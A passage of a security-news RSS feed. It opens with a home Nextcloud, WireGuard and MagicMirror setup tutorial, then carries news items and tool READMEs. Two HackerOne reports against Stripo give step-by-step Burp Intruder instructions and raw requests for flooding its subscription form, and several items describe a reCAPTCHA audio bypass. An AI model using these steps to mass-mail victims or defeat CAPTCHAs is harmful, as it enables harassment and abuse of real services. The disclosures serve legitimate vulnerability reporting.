<li><a href="https://nextcloud.example.com/nextcloud/">https://nextcloud.example.com/nextcloud/</a></li>
</ul>
<p>You can do this under your profile &gt; users in an admin account.</p>
<p>I created an account for each of the family members, a generic one for the house, and a readonly one for the <a href="http://hackerpublicradio.org/eps.php?id=3039">MagicMirror</a>.</p>
<p>The house account houses (pun intended) the shared calendar, files, and contacts. All the family accounts have read and write access to these, except for the MagicMirror one which only needs to read the calendar and contacts.</p>
<h2>Fdroid</h2>
<p>Now you can install the software you will need on your phones.</p>
<ul>
<li><a href="https://f-droid.org/en/packages/com.nextcloud.client/">NextCloud</a> Synchronization client</li>
<li><a href="https://f-droid.org/en/packages/at.bitfire.davdroid/">DAVx</a> DAVx? CalDAV/CardDAV Synchronization and Client</li>
<li><a href="https://f-droid.org/en/packages/org.dmfs.tasks/">OpenTasks</a> Keep track of your list of goals</li>
<li><a href="https://f-droid.org/en/packages/com.wireguard.android/">WireGuard</a> Next generation secure VPN network tunnel</li>
</ul>
<p>You will need to setup the NextCloud client using the url <code>https://nextcloud.example.com/nextcloud/</code>, username and password.</p>
<p>Then you set up DAVx using another url <code>https://nextcloud.example.com/nextcloud/remote.php/dav</code>, but the same , username and password.</p>
<p>By the way if you want to access files you can do so via <code>davs://nextcloud.example.com/nextcloud/remote.php/dav/files/house/</code></p>
<p>I set up the NextCloud client to automatically upload photos, and videos to the server.</p>
<p>To set up WireGuard you need to create a connection for each device connecting</p>
<pre><code>root@nextcloud:~# pivpn add
Enter a Name for the Client: Mobile_Worker
::: Client Keys generated
::: Client config generated
::: Updated server config
::: WireGuard reloaded
======================================================================
::: Done! Mobile_Worker.conf successfully created!
::: Mobile_Worker.conf was copied to /home/ken/configs for easy transfer.
::: Please use this profile only on one device and create additional
::: profiles for other devices. You can also use pivpn -qr
::: to generate a QR Code you can scan with the mobile app.
======================================================================</code></pre>
<p>Then open display the qrcode as follows:</p>
<pre><code>root@nextcloud:~# pivpn qrcode
::  Client list  ::
1) Mobile_Worker
Please enter the Index/Name of the Client to show: </code></pre>
<p>Pressing <code>1</code> in my case will display the QRCode.</p>
<p>Open the WireGuard app on the phone and press <code>+</code> to add an account, and select <em>scan from qr code</em>.</p>
<p>Point it to QRCode and that's it.</p>
<p>If you want to remove a client, you can just use <code>pivpn remove</code></p>
<pre><code>root@nextcloud:~# pivpn remove
::  Client list  ::
1) Mobile_Worker
Please enter the Index/Name of the Client to be removed from the list above: 6
Do you really want to delete Mobile_Worker? [Y/n] y
::: Updated server config
::: Client config for Mobile_Worker removed
::: Client Keys for Mobile_Worker removed
::: Successfully deleted Mobile_Worker
::: WireGuard reloaded</code></pre>
<h2>MagicMirror</h2>
<p>The final step is to have the <a href="http://hackerpublicradio.org/eps.php?id=3039">MagicMirror</a> in the living room display the shared calendar.</p>
<p>To display your calendar there, you need to have an <a href="https://en.wikipedia.org/wiki/ICalendar">ics iCalendar</a> file.</p>
<p>You can get that by login into NextCloud as the MagicMirror user via the web, going to the calendar you desire to export. Click the <code>...</code> menu and select "Copy Private Link".</p>
<p>You can then add the <code>?export</code> at the end of the url to get an ical export.</p>
<p><a href="http://hackerpublicradio.org/correspondents.php?hostid=225">Dave</a> gave me a tip on how to have MagicMirror serve this file, by using its own local webserver. You point it to a local directory eg: <code>http://localhost:8080/modules/.calendars/</code>. Don't forget to create it.</p>
<pre><code>mkdir -p ~/MagicMirror/modules/.calendars/</code></pre>
<p>I wrote a script that would first get a new version of the ical file, and if it is downloaded correctly would immediately overwrite the previous one.</p>
<pre><code>[magicmirror@magicmirror ~]$ cat /home/pi/bin/cal.bash
#!/bin/bash
wget --quiet --output-document /home/pi/MagicMirror/modules/.calendars/home_calendar.ics.tmp --auth-no-challenge --http-user=magicmirror --http-password="PASSWORD" "https://nextcloud.example.com/nextcloud/remote.php/dav/calendars/magicmirror/personal_shared_by_House/?export" &gt; /dev/null 2&gt;&amp;1
if [ -s /home/pi/MagicMirror/modules/.calendars/home_calendar.ics.tmp ]
then
  mv /home/pi/MagicMirror/modules/.calendars/home_calendar.ics.tmp /home/pi/MagicMirror/modules/.calendars/home_calendar.ics
fi
[snip...]</code></pre>
<p>I then scheduled this to run every 15 minutes.</p>
<pre><code>[magicmirror@magicmirror ~]$ crontab -l
*/15 * * * * /home/pi/bin/cal.bash &gt;/dev/null 2&gt;&amp;1</code></pre>
<p>The final step was to update my Calendar entry in the <code>~/MagicMirror/config/config.js</code> config file.</p>
<pre><code>        // Calendar
        {
            module: "calendar",
            header: "Calendar",
            position: "top_center",
            config: {
                colored: true,
                maxTitleLength: 30,
                fade: false,
                calendars: [
                    {
                        name: "Family Calendar",
                        url: "http://localhost:8080/modules/.calendars/home_calendar.ics",
                        symbol: "calendar-check",
                        color: "#825BFF" // violet-ish
                    },
                    {
                        name: "Birthday Calendar",
                        url: "http://localhost:8080/modules/.calendars/birthday_calendar.ics",
                        symbol: "calendar-check",
                        color: "#FFCC00" // violet-ish
                    },
                    {
                        // Calendar uses repeated 'RDATE' entries, which this iCal parser
                        // doesn't seem to recognise. Only the next event is visible, and
                        // the calendar has to be refreshed *after* the event has passed.
                        name: "HPR Community News recordings",
                        url: "http://hackerpublicradio.org/HPR_Community_News_schedule.ics",
                        symbol: "calendar-check",
                        color: "#C465A7" // purple
                    },
                    {
                        // https://inzamelkalender.gad.nl/ical-info
                        name: "GAD Calendar",
                        url: "https://inzamelkalender.gad.nl/ical/0381200000107654",
                        symbol: "calendar-check",
                        color: "#00CC00" // Green
                    },
                ]
            }
        },</code></pre>
<p>The contacts birthday wasn't available to the MagicMirror user immediately after I created it, so I was able to force an update as follows:</p>
<pre><code>root@nextcloud:/var/www/html/nextcloud# sudo -u www-data php occ dav:sync-birthday-calendar
Start birthday calendar sync for all users ...
    7 [============================]</code></pre>
<h1>Conclusion</h1>
<p>With that we have a family sharing solution just like other normal house holds. Yet with the security of knowing that the data doesn't leave the house, and is not being used without your approval.</p>
<p>You can tell it's a hit, because now people are scheduling tech support tasks via the app.</p>
<p>Ah well.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Fake Google reCAPTCHA Phishing Attack Swipes Office 365 Passwords]]></title>
<description><![CDATA[A phishing attack targeting Microsoft users leverages a bogus Google reCAPTCHA system.]]></description>
<link>https://tsecurity.de/de/1402348/it-security-nachrichten/fake-google-recaptcha-phishing-attack-swipes-office-365-passwords/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1402348/it-security-nachrichten/fake-google-recaptcha-phishing-attack-swipes-office-365-passwords/</guid>
<pubDate>Mon, 08 Mar 2021 18:15:33 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A phishing attack targeting Microsoft users leverages a bogus Google reCAPTCHA system.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wifi-Password - Quickly Fetch Your WiFi Password And If Needed, Generate A QR Code Of Your WiFi To Allow Phones To Easily Connect]]></title>
<description><![CDATA[Quickly fetch your WiFi password and if needed, generate a QR code of your WiFi to allow phones to easily connect. Works on macOS and Linux and WindowsInstallation  Install using pip  $ python3 -m pip install --user wifi-password  Install using git  $ git clone https://github.com/sdushantha/wifi-...]]></description>
<link>https://tsecurity.de/de/1373514/it-security-nachrichten/wifi-password-quickly-fetch-your-wifi-password-and-if-needed-generate-a-qr-code-of-your-wifi-to-allow-phones-to-easily-connect/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1373514/it-security-nachrichten/wifi-password-quickly-fetch-your-wifi-password-and-if-needed-generate-a-qr-code-of-your-wifi-to-allow-phones-to-easily-connect/</guid>
<pubDate>Mon, 08 Feb 2021 21:00:15 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://1.bp.blogspot.com/-reAj7hkDtSs/YBoYqsUZ5DI/AAAAAAAAVO0/EnssIRSTyDo_cGVf7ZrEW-SeeMTKvP3TgCNcBGAsYHQ/s1157/wifi-password_1_demo.gif" imageanchor="1"><img border="0" data-original-height="720" data-original-width="1157" height="398" src="https://1.bp.blogspot.com/-reAj7hkDtSs/YBoYqsUZ5DI/AAAAAAAAVO0/EnssIRSTyDo_cGVf7ZrEW-SeeMTKvP3TgCNcBGAsYHQ/w640-h398/wifi-password_1_demo.gif" width="640"></a></div><p><br></p><p>Quickly fetch your WiFi password and if needed, generate a QR code of your WiFi to allow phones to easily connect. </p><p>Works on <b>macOS</b> and <b>Linux</b> and <b>Windows</b></p><p><span></span></p><a name="more"></a><b><br></b><p></p><span><b>Installation</b></span><br>  <br><span><b>Install using <code>pip</code></b></span><br>  <div><pre><code>$ python3 -m pip install --user wifi-password</code></pre></div>  <br><span><b>Install using <code>git</code></b></span><br>  <pre><code>$ git clone https://github.com/sdushantha/wifi-password<br>$ cd wifi-password<br>$ python3 setup.py install<br></code></pre>  <br><span><b>Install using the <a href="https://aur.archlinux.org/packages/wifi-password/" rel="nofollow" target="_blank" title="AUR">AUR</a></b></span><br>  <div><pre><code>$ sudo pamac build wifi-password</code></pre></div>  <br><span><b>Usage</b></span><br>  <div><pre><code>$ wifi-password<br>usage: wifi_password [options]<br><br>optional arguments:<br>  -h, --help            show this help message and exit<br>  --qrcode, -q          Generate a QR code<br>  --image, -i           Create the QR code as image instead of showing it on the terminal (must be useed along with --qrcode)<br>  --ssid SSID, -s SSID  Specify a SSID that you have previously connected to<br>  --version             Show version number</code></pre></div>  <br><span><b>Reference</b></span><br>  <ul>  <li>This project is an improvement of <a href="https://github.com/rauchg/wifi-password" rel="nofollow" target="_blank" title="wifi-password">wifi-password</a> created by <a href="https://github.com/rauchg" rel="nofollow" target="_blank" title="@rauchg">@rauchg</a>, where I have added support for multiple platforms and have added the feature for generating QR codes.</li>  <li><a href="https://github.com/ankitjain28may/wifiPassword" rel="nofollow" target="_blank" title="wifiPassword">wifiPassword</a> created by <a href="https://github.com/ankitjain28may" rel="nofollow" target="_blank" title="@ankitjain28may">@ankitjain28may</a> was frequently used as reference throughout the development of this project.</li>  </ul>  <br><br><div><b><span><a class="kiploit-download" href="https://github.com/sdushantha/wifi-password" rel="nofollow" target="_blank" title="Download Wifi-Password">Download Wifi-Password</a></span></b></div><img src="http://feeds.feedburner.com/~r/PentestTools/~4/QePC8wqJcJU" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Stripo Inc: No rate limit in email subscription]]></title>
<description><![CDATA[I managed to bypass the following report #1029723 please follow the steps below: Description: No rate limit in Email Subscription, you just have to add a fixed throttle in Burp Suite to avoid the 429 response. Note: I will use tempmail in the screenshots PoC Steps:  Go to https://stripo.email/ an...]]></description>
<link>https://tsecurity.de/de/1347664/sicherheitsluecken/stripo-inc-no-rate-limit-in-email-subscription/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1347664/sicherheitsluecken/stripo-inc-no-rate-limit-in-email-subscription/</guid>
<pubDate>Mon, 11 Jan 2021 10:48:51 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<br><img height="200" width="200" src="http://vulners.com/static/img/hackerone.png" alt="image"><br>I managed to bypass the following report #1029723 please follow the steps below: Description: No rate limit in Email Subscription, you just have to add a fixed throttle in Burp Suite to avoid the 429 response. Note: I will use tempmail in the screenshots PoC Steps:  Go to https://stripo.email/ and scroll down to the subscribe field Put an email Click on Subscribe and intercept the following request  ``` POST /fr/subscribe/ HTTP/1.1 Host: stripo.email User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 Accept: / Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-CSRF-TOKEN: OC5q3gnsKxUZRrGIN3ke5ZdqEbmneEuknaNmnQUe X-Requested-With: XMLHttpRequest Content-Length: 129 Origin: https://stripo.email Connection: close Referer: https://stripo.email/ _token=&amp;amp;source=LANDING&amp;amp;subscribe-email=kakema3700%40tdcryo.com&amp;amp;g-recaptcha-response= `` 4.Send the request to Burp intruder, go to thePositionstab and clear the§5.Add§in the last number of theAccept-Languageheader like thisAccept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.§3§6.Go toPayloadstab and chooseNull payloadsin thePayload type7.You can set how much email you want to send..50for example in theGeneratefield 8.Go toOptionstab and change theThrottle (milliseconds)Fixed value to **1500** or more.. 9.Click onStart attack` You will start receiving emails. Suggested Mitigation: Add a number of...]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Chrome OS: Die Kamera-App erhält einen QR-Code Scanner & neue Galerie-Features (Screenshots)]]></title>
<description><![CDATA[Google wird dem Betriebssystem Chrome OS schon bald eine ganze Reihe von Neuerungen spendieren, die den Nutzern unter anderem einen stark verbesserten Bildbetrachter bringen. Aber auch bei der lokal verfügbaren Kamera-App wurde nun ein neues Feature entdeckt, das sich in der Canary-Version bereit...]]></description>
<link>https://tsecurity.de/de/1344882/it-nachrichten/google-chrome-os-die-kamera-app-erhaelt-einen-qr-code-scanner-neue-galerie-features-screenshots/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1344882/it-nachrichten/google-chrome-os-die-kamera-app-erhaelt-einen-qr-code-scanner-neue-galerie-features-screenshots/</guid>
<pubDate>Thu, 07 Jan 2021 07:02:52 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google wird dem Betriebssystem Chrome OS schon bald eine ganze Reihe von Neuerungen spendieren, die den Nutzern unter anderem einen stark verbesserten Bildbetrachter bringen. Aber auch bei der lokal verfügbaren Kamera-App wurde nun ein neues Feature entdeckt, das sich in der Canary-Version bereits nutzen lässt und in vielen Fällen sehr praktisch sein dürfte: Ein QR-Code […]<center><a href="https://goo.gl/oJUmcq"><img src="https://images-na.ssl-images-amazon.com/images/G/03/associates/maitri/banner/DE_Asso_18-7-14_banners_SSD_changes_300x250.gif"></a></center>
<br><a href="https://www.googlewatchblog.de/2021/01/google-chrome-os-qrcode/">Google Chrome OS: Die Kamera-App erhält einen QR-Code Scanner &amp; neue Galerie-Features (Screenshots)</a> — <a href="https://www.googlewatchblog.de/">GoogleWatchBlog</a> <br><a href="https://mewe.com/p/googlewatchblog"><span>GoogleWatchBlog auf MeWe </span><img src="https://ssl.gstatic.com/images/icons/gplus-16.png" alt="" width="16" height="16" border="0"></a>— <a href="https://facebook.com/GoogleWatchBlog"><span>GoogleWatchBlog auf Facebook </span><img src="https://static.googlewatchblog.de/img/facebookicon.png" alt="" width="16" height="16" border="0"></a><center><a href="https://ssl-vg03.met.vgwort.de/na/4d5eaec42c5b4b2b8e71dcb9c35a1b5f"><img alt="vgwort" src="https://ssl-vg03.met.vgwort.de/na/4d5eaec42c5b4b2b8e71dcb9c35a1b5f" width="50" height="50"></a></center>
]]></content:encoded>
</item>
<item>
<title><![CDATA[unCAPTCHA3 evades Google Audio reCAPTCHA with Speech-to-Text API]]></title>
<description><![CDATA[While CAPTCHAs still supposedly serve to distinguish between human users and automated traffic, one more time, a bypass has appeared.
unCAPTCHA3 evades Google Audio reCAPTCHA with Speech-to-Text API on Latest Hacking News.]]></description>
<link>https://tsecurity.de/de/1344098/it-security-nachrichten/uncaptcha3-evades-google-audio-recaptcha-with-speech-to-text-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1344098/it-security-nachrichten/uncaptcha3-evades-google-audio-recaptcha-with-speech-to-text-api/</guid>
<pubDate>Wed, 06 Jan 2021 11:16:54 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>While CAPTCHAs still supposedly serve to distinguish between human users and automated traffic, one more time, a bypass has appeared.</p>
<p><a rel="nofollow" href="https://latesthackingnews.com/2021/01/06/uncaptcha3-evades-google-audio-recaptcha-with-speech-to-text-api/">unCAPTCHA3 evades Google Audio reCAPTCHA with Speech-to-Text API</a> on <a rel="nofollow" href="https://latesthackingnews.com/">Latest Hacking News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Google Speech-to-Text API Can Help Attackers Easily Bypass Google reCAPTCHA]]></title>
<description><![CDATA[A three-year-old attack technique to bypass Google's audio reCAPTCHA by using its own Speech-to-Text API has been found to still work with 97% accuracy.
Researcher Nikolai Tschacher disclosed his findings in a proof-of-concept (PoC) of the attack on January 2.
"The idea of the attack is very simp...]]></description>
<link>https://tsecurity.de/de/1342999/it-security-nachrichten/google-speech-to-text-api-can-help-attackers-easily-bypass-google-recaptcha/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1342999/it-security-nachrichten/google-speech-to-text-api-can-help-attackers-easily-bypass-google-recaptcha/</guid>
<pubDate>Tue, 05 Jan 2021 11:16:42 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A three-year-old attack technique to bypass Google's audio reCAPTCHA by using its own Speech-to-Text API has been found to still work with 97% accuracy.
Researcher Nikolai Tschacher disclosed his findings in a proof-of-concept (PoC) of the attack on January 2.
"The idea of the attack is very simple: You grab the MP3 file of the audio reCAPTCHA and you submit it to Google's own speech-to-text API<img src="http://feeds.feedburner.com/~r/TheHackersNews/~4/S1wKnIzN4Iw" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[How to bypass the Google Audio reCAPTCHA with a new version of unCaptcha2 attack]]></title>
<description><![CDATA[A German security researcher demonstrated how to break, once again, the Google Audio reCAPTCHA with Google’s own Speech to Text API. Back in 2017, researchers from the University of Maryland demonstrated an attack method, dubbed unCaptcha, against Google’s audio-based reCAPTCHA v2. The system rec...]]></description>
<link>https://tsecurity.de/de/1342929/hacking/how-to-bypass-the-google-audio-recaptcha-with-a-new-version-of-uncaptcha2-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1342929/hacking/how-to-bypass-the-google-audio-recaptcha-with-a-new-version-of-uncaptcha2-attack/</guid>
<pubDate>Tue, 05 Jan 2021 10:00:49 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A German security researcher demonstrated how to break, once again, the Google Audio reCAPTCHA with Google’s own Speech to Text API. Back in 2017, researchers from the University of Maryland demonstrated an attack method, dubbed unCaptcha, against Google’s audio-based reCAPTCHA v2. The system receives the audio challenge, downloads it, and submits it to Speech To […]</p>
<p>The post <a rel="nofollow" href="https://securityaffairs.co/wordpress/113013/hacking/google-audio-recaptcha-bypass.html">How to bypass the Google Audio reCAPTCHA with a new version of unCaptcha2 attack</a> appeared first on <a rel="nofollow" href="https://securityaffairs.co/wordpress">Security Affairs</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Researcher Breaks reCAPTCHA With Google’s Speech-to-Text API]]></title>
<description><![CDATA[Researcher uses an old unCAPTCHA trick against latest the audio version of reCAPTCHA, with a 97 percent success rate.]]></description>
<link>https://tsecurity.de/de/1342659/it-security-nachrichten/researcher-breaks-recaptcha-with-googles-speech-to-text-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1342659/it-security-nachrichten/researcher-breaks-recaptcha-with-googles-speech-to-text-api/</guid>
<pubDate>Mon, 04 Jan 2021 23:01:32 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Researcher uses an old unCAPTCHA trick against latest the audio version of reCAPTCHA, with a 97 percent success rate.]]></content:encoded>
</item>
<item>
<title><![CDATA[Old Attack Method Against Google's Audio-Based reCAPTCHA Resurrected]]></title>
<description><![CDATA[An attack method discovered in 2017 for defeating the audio version of Google’s reCAPTCHA system using speech-to-text services has once again been resurrected.
read more]]></description>
<link>https://tsecurity.de/de/1342182/it-security-nachrichten/old-attack-method-against-googles-audio-based-recaptcha-resurrected/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1342182/it-security-nachrichten/old-attack-method-against-googles-audio-based-recaptcha-resurrected/</guid>
<pubDate>Mon, 04 Jan 2021 14:16:38 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><strong><span><span>An attack method discovered in 2017 for defeating the audio version of Google’s reCAPTCHA system using speech-to-text services has once again been resurrected.</span></span></strong></p>
<p><a href="https://www.securityweek.com/old-attack-method-against-googles-audio-based-recaptcha-resurrected" target="_blank">read more</a></p><div class="feedflare">
<a href="http://feeds.feedburner.com/~ff/Securityweek?a=atIcSffGMkc:nXbP5pI83Rw:yIl2AUoC8zA"><img src="http://feeds.feedburner.com/~ff/Securityweek?d=yIl2AUoC8zA" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=atIcSffGMkc:nXbP5pI83Rw:-BTjWOF_DHI"><img src="http://feeds.feedburner.com/~ff/Securityweek?i=atIcSffGMkc:nXbP5pI83Rw:-BTjWOF_DHI" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=atIcSffGMkc:nXbP5pI83Rw:dnMXMwOfBR0"><img src="http://feeds.feedburner.com/~ff/Securityweek?d=dnMXMwOfBR0" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=atIcSffGMkc:nXbP5pI83Rw:V_sGLiPBpWU"><img src="http://feeds.feedburner.com/~ff/Securityweek?i=atIcSffGMkc:nXbP5pI83Rw:V_sGLiPBpWU" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=atIcSffGMkc:nXbP5pI83Rw:qj6IDK7rITs"><img src="http://feeds.feedburner.com/~ff/Securityweek?d=qj6IDK7rITs" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=atIcSffGMkc:nXbP5pI83Rw:gIN9vFwOqvQ"><img src="http://feeds.feedburner.com/~ff/Securityweek?i=atIcSffGMkc:nXbP5pI83Rw:gIN9vFwOqvQ" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=atIcSffGMkc:nXbP5pI83Rw:TzevzKxY174"><img src="http://feeds.feedburner.com/~ff/Securityweek?d=TzevzKxY174" border="0"></a> <a href="http://feeds.feedburner.com/~ff/Securityweek?a=atIcSffGMkc:nXbP5pI83Rw:F7zBnMyn0Lo"><img src="http://feeds.feedburner.com/~ff/Securityweek?i=atIcSffGMkc:nXbP5pI83Rw:F7zBnMyn0Lo" border="0"></a>
</div><img src="http://feeds.feedburner.com/~r/Securityweek/~4/atIcSffGMkc" height="1" width="1" alt="">]]></content:encoded>
</item>
<item>
<title><![CDATA[Stripo Inc: No rate limiting for subscribe email + lead to Cross origin misconfiguration]]></title>
<description><![CDATA[Summary: I found bypass no rate limiting using Access-Control-Allow-Origin: and look the response as 200 vulnerable No rate limit means their is no mechanism to protect against the requests you made in a short frame of time. If the repetition doesn&#x27;t give any error after 50, 100, 1000 repeti...]]></description>
<link>https://tsecurity.de/de/1312793/sicherheitsluecken/stripo-inc-no-rate-limiting-for-subscribe-email-lead-to-cross-origin-misconfiguration/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1312793/sicherheitsluecken/stripo-inc-no-rate-limiting-for-subscribe-email-lead-to-cross-origin-misconfiguration/</guid>
<pubDate>Mon, 30 Nov 2020 13:33:31 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<br><img height="200" width="200" src="http://vulners.com/static/img/hackerone.png" alt="image"><br>Summary: I found bypass no rate limiting using Access-Control-Allow-Origin: and look the response as 200 vulnerable No rate limit means their is no mechanism to protect against the requests you made in a short frame of time. If the repetition doesn&amp;#x27;t give any error after 50, 100, 1000 repetitions then their will be no rate limit set. vulnerable has registred in #297359 #774050 #922470 URL Effected https://stripo.email/subscribe/ Step-by-step Reproduction Instructions:  Go to url https://stripo.email/ and scrolls look the subscribe button Add the victim emails, and repreat to burp-suite Sent request to burp-intruder, and clear all payloads § In the payloads set a null-payloads and run intruder Boom 1Million request sent to victim-email  Request ``` POST /subscribe/ HTTP/1.1 Host: stripo.email X-Requested-With: XMLHttpRequest Content-Length: 126 Origin: https://evil.stripo.email Connection: close Referer: https://evil.stripo.email/ _token=§§&amp;amp;source=LANDING&amp;amp;subscribe-email=hostbugbounty%40gmail.com&amp;amp;g-recaptcha-response= **Responsive Vulnerability** HTTP/1.1 200 OK Server: nginx Date: Mon, 09 Nov 2020 04:33:08 GMT Content-Type: application/json Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Cache-Control: private, must-revalidate pragma: no-cache expires: -1 X-RateLimit-Limit: 20 X-RateLimit-Remaining: 14 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000; includeSubDomains X-Frame-Options: SAMEORIGIN Access-Control-Allow-Origin:...]]></content:encoded>
</item>
<item>
<title><![CDATA[Bunkerized-Nginx - Nginx Docker Image Secure By Default]]></title>
<description><![CDATA[nginx Docker image secure by default.  Avoid the hassle of following security best practices each time you need a web server or reverse proxy. Bunkerized-nginx provides generic security configs, settings and tools so you don't need to do it yourself.  Non-exhaustive list of features :    HTTPS su...]]></description>
<link>https://tsecurity.de/de/1309010/it-security-nachrichten/bunkerized-nginx-nginx-docker-image-secure-by-default/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1309010/it-security-nachrichten/bunkerized-nginx-nginx-docker-image-secure-by-default/</guid>
<pubDate>Thu, 26 Nov 2020 12:01:44 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="separator"><a href="https://1.bp.blogspot.com/-_dNj-zGfDHk/X78n1Cm44uI/AAAAAAAAUeU/p01vT0T8LacScDWE6GMQZEmVdNoJ1zk-gCNcBGAsYHQ/s594/bunkerized-nginx_1_logo.png" imageanchor="1"><img border="0" data-original-height="594" data-original-width="578" height="400" src="https://1.bp.blogspot.com/-_dNj-zGfDHk/X78n1Cm44uI/AAAAAAAAUeU/p01vT0T8LacScDWE6GMQZEmVdNoJ1zk-gCNcBGAsYHQ/w389-h400/bunkerized-nginx_1_logo.png" width="389"></a></div><p><br></p>  <p>nginx Docker image secure by default.</p>  <p>Avoid the hassle of following security best practices each time you need a web server or reverse proxy. Bunkerized-nginx provides generic security configs, settings and tools so you don't need to do it yourself.</p><span><a name="more"></a></span><p><br></p>  <p>Non-exhaustive list of features :</p>  <ul>  <li>HTTPS support with transparent Let's Encrypt automation</li>  <li>State-of-the-art web security : HTTP security headers, prevent leaks, TLS hardening, ...</li>  <li>Integrated <a href="https://www.kitploit.com/search/label/ModSecurity" target="_blank" title="ModSecurity">ModSecurity</a> WAF with the OWASP Core Rule Set</li>  <li>Automatic ban of strange behaviors with fail2ban</li>  <li>Antibot challenge through cookie, javascript, captcha or recaptcha v3</li>  <li>Block TOR, proxies, bad user-agents, countries, ...</li>  <li>Block known bad IP with DNSBL and CrowdSec</li>  <li>Prevent <a href="https://www.kitploit.com/search/label/Bruteforce%20Attacks" target="_blank" title="bruteforce attacks">bruteforce attacks</a> with rate limiting</li>  <li>Detect bad files with ClamAV</li>  <li>Easy to configure with environment variables</li>  </ul>  <p>Fooling automated tools/scanners :</p><p><br></p><div class="separator"><a href="https://1.bp.blogspot.com/-kSXvDtAb2kM/X78oCWOs3iI/AAAAAAAAUeY/GwFIqhKAMCAd1q6AvQ6BdUNKIcdwOLiJwCNcBGAsYHQ/s694/bunkerized-nginx_7_demo.gif" imageanchor="1"><img border="0" data-original-height="604" data-original-width="694" height="558" src="https://1.bp.blogspot.com/-kSXvDtAb2kM/X78oCWOs3iI/AAAAAAAAUeY/GwFIqhKAMCAd1q6AvQ6BdUNKIcdwOLiJwCNcBGAsYHQ/w640-h558/bunkerized-nginx_7_demo.gif" width="640"></a></div><p><br></p><span><b>Live demo</b></span><br>  <p>You can find a live demo at <a href="https://demo-nginx.bunkerity.com/" rel="nofollow" target="_blank" title="https://demo-nginx.bunkerity.com">https://demo-nginx.bunkerity.com</a>.</p>  <br><span><b>Quickstart guide</b></span><br>  <br><span><b>Run HTTP server with default settings</b></span><br>  <div><pre><code>docker run -p 80:8080 -v /path/to/web/files:/www:ro bunkerity/bunkerized-nginx</code></pre></div>  <p>Web files are stored in the /www directory, the container will serve files from there.</p>  <br><span><b>In combination with PHP</b></span><br>  <div><pre><code>docker network create mynet<br>docker run --network mynet \<br>           -p 80:8080 \<br>           -v /path/to/web/files:/www:ro \<br>           -e REMOTE_PHP=myphp \<br>           -e REMOTE_PHP_PATH=/app \<br>           bunkerity/bunkerized-nginx<br>docker run --network mynet \<br>           --name=myphp \<br>           -v /path/to/web/files:/app \<br>           php:fpm</code></pre></div>  <p>The <code>REMOTE_PHP</code> environment variable lets you define the address of a remote PHP-FPM instance that will execute the .php files. <code>REMOTE_PHP_PATH</code> must be set to the directory where the PHP container will find the files.</p>  <br><span><b>Run HTTPS server with automated Let's Encrypt</b></span><br>  <div><pre><code>docker run -p 80:8080 \<br>           -p 443:8443 \<br>           -v /path/to/web/files:/www:ro \<br>           -v /where/to/save/certificates:/etc/letsencrypt \<br>           -e SERVER_NAME=www.yourdomain.com \<br>           -e AUTO_LETS_ENCRYPT=yes \<br>           -e REDIRECT_HTTP_TO_HTTPS=yes \<br>           bunkerity/bunkerized-nginx</code></pre></div>  <p>Certificates are stored in the /etc/letsencrypt directory, you should save it on your local drive.<br>  If you don't want your webserver to listen on HTTP add the environment variable <code>LISTEN_HTTP</code> with a <em>no</em> value. But Let's Encrypt needs the port 80 to be opened so redirecting the port is mandatory.</p>  <p>Here you have three environment variables 